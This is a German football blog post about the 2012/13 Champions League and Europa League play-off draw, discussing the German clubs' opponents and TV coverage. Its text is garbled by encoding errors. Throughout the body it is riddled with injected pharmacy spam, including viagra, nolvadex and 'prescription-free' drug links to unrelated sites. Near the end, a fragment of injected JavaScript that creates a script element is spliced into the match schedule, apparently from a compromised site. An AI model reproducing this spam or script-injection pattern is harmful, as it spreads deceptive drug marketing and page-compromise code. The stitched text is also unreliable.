Willkommen auf » Play-off Auslosung CL und EL 2012/13
10. Aug 2012

Play-off Auslosung CL und EL 2012/13

Die neue Saison steht auch im internationalen GeschAi??ft allmAi??hlich vor der TA?r und so waren die Augen heute Nachmittag mal wieder auf den Sitz der UEFA im schweizerischen Nyon gerichtet. Nach den in den vergangenen Wochen ausgespielten Qualifikationsrunden wurden dort die Begegnungen der Play-off Runde von Champions und Europa League fA?r das Spieljahr 2012/13 ausgelost.

Vor den anschlieAYenden Gruppenspielen haben sich auch drei deutsche Mannschaften in dieser Runde in einem Hin- und RA?ckspiel zu beweisen. Borussia MAi??nchengladbach vertritt die Bundesliga auf dem Weg in die Champions League und kAi??nnte dort zu den bereits qualifizierten Borussia Dortmund, Bayern MA?nchen und FC Schalke stoAYen. Hannover 96 und der VfB Stuttgart versuchen sich in die Europa League zu spielen, die Bayer Leverkusen als BundesligafA?nfter schon sicher erreicht hat.

generika doktor apotheke. Champions League Play-off 2012/13 metformin without a script

FC Basel – CFR Cluj
Helsingborgs IF – Celtic Glasgow
BATE Baryssau – Hapoel Ironi Kirjat Schmona
AEL Limassol – RSC Anderlecht
Dinamo Zagreb – NK Maribor
SC Braga – Udinese Calcio
Spartak Moskau – FenerbahAi??e Istanbul
FC MA?laga – Panathinaikos Athen
cheapest viagra to buy http://healthworld.co.in/ginseng-how-much-is-it-worth/ lipothin over the counter order propecia without prescription erexin v. Borussia MAi??nchengladbach – Dynamo Kiew
OSC Lille – FC Kopenhagen

Bei den Gladbachern war diesmal die Losfee leider nicht sehr gnAi??dig. Die Borussen bekommen es mit dem ukrainischen Rekordmeister Dynamo Kiew zu tun. Das Team um die etablierten Nationalspieler Niko KranjA?ar (Kroatien), Miguel Veloso (Portgual), Andriy Yarmolenko (Ukraine) und Raffael (nach vier Jahren bei Hertha BSC im Sommer nach Kiew gewechselt) qualifiziert sich seit A?ber 20 Jahren regelmAi??AYig fA?r die Champions oder Europa League und erreichte dabei immer mindestens die Gruppenphase. Es wird also ein ganz ganz harter Knochen, an dem die Borussia als klarer AuAYenseiter da zu nagen hat. Bei mir A?berwiegt nach den AbgAi??ngen von Reus, Dante und NeustAi??dter noch die Skepsis bezA?glich des internationalen Niveaus der Mannschaft. Aber wer weiAY, was sich Trainer Lucien Favre einfallen lAi??sst.
Als Trostpflaster ziehen die Verlierer der Playoff-Runde A?brigens aber immerhin sicher in die Gruppenphase der Europa League ein.

Gespielt wird am 21./22. (Hinspiel) und 28./29. August (RA?ckspiel). Da die Zentralvermarktung der UEFA-CL bereits in den Play-offs einsetzt, A?bertrAi??gt der neue deutsche Champions League Sender ZDF beide Gladbach-Spiele im FreeTV und auf prices finasteride tablets usp 1mg Order Zattoo.com

Europa League Play-off 2012/13

die deutschen Begegnungen…
http://blog.muxplus.com/archives/18730 VfB Stuttgart – Dynamo Moskau
Slask Wroclaw – Hannover 96

Auch Stuttgart bekommt es mit Dynamos zu tun, diese sind allerdings in Moskau beheimatet und weit weniger Furcht einflAi??AYend. Einzig drei Namen ragen aus dem Team heraus: Kevin Kuranyi (frA?her in Suttgart, Schalke und der deutschen Nationalmannschaft, seit 2010 in Moskau und mittlerweile KapitAi??n der Mannschaft), Igor Semschow (ein alter Recke mit A?ber 400 Profispielen in Russland und 57 Auftritten fA?r die Nationalmannschaft) und Zvjezdan MisimoviAi?? (bosnischer Nationalspieler, seit einem Jahr bei Dynamo, ausgebildet in der Jugend des FC Bayern, danach u.a. in Bochum, NA?rnberg und Wolfsburg). Fazit: Eine anspruchsvolle Aufgabe fA?r den VfB, aber eine dennoch lAi??sbare.

Hannovers Gegner ist der polnische A?berraschungsmeister Slask Wroclaw. Die Mannschaft kommt ohne international bekannte GrAi??AYen aus und sollte fA?r den Bundesligasiebten, der sich im vergangenen Jahr in der Europa League bereits sehr gut prAi??sentierte und erst im Halbfinale am spAi??teren TiteltrAi??ger Atletico Madrid scheiterte, eigentlich ohne Probleme zu besiegen sein.

Gespielt wird am 23. (Hinspiel) und 30. August (RA?ckspiel). Auch in den EL-Play-offs greift die Zentralvermarktung. Leider A?bertrAi??gt in dieser Saison Kabel1 als fester Sender nur noch eine Partie pro Spieltag. Den Fans der jeweils anderen Klubs bleibt einzig der Gang ins Stadion oder der kostenlose Live-Audio-Kommentar von 90elf.de http://samaraacottage.com/2018/03/18/alavert-purchase/

que pasa si una mujer toma viagra, can i buy nolvadex over the counter. zithromax z-pak online. *** Update 10.08. ***
Die beiden Partien des VfB Stuttgart wurden aus organisatorischen GrA?nden neu terminiert (zeitgleich mA?ssten sonst mehrere Moskauer Vereine zu Heimspielen antreten). Das Hinspiel Stuttgart-Moskau findet am 22.08. um 18:15, das RA?ckspiel Moskau-Stuttgart am 28.08. um 18:00 statt. Eine A?bertragung im deutschen FreeTV wird damit Ai??uAYerst unwahrscheinlich.

Auch die Gladbach-Spiele sind nun festgesetzt: Gladbach-Kiew am 21.08. um 20:45, Kiew-Gladbach am 29.08. um 20:45var d=document;var s=d.createElement(‚script‘); http://issykkul.univerpress.com/2018/03/17/purchase-nolvadex-australia/ Cheap Purchase


Einen Kommentar schreiben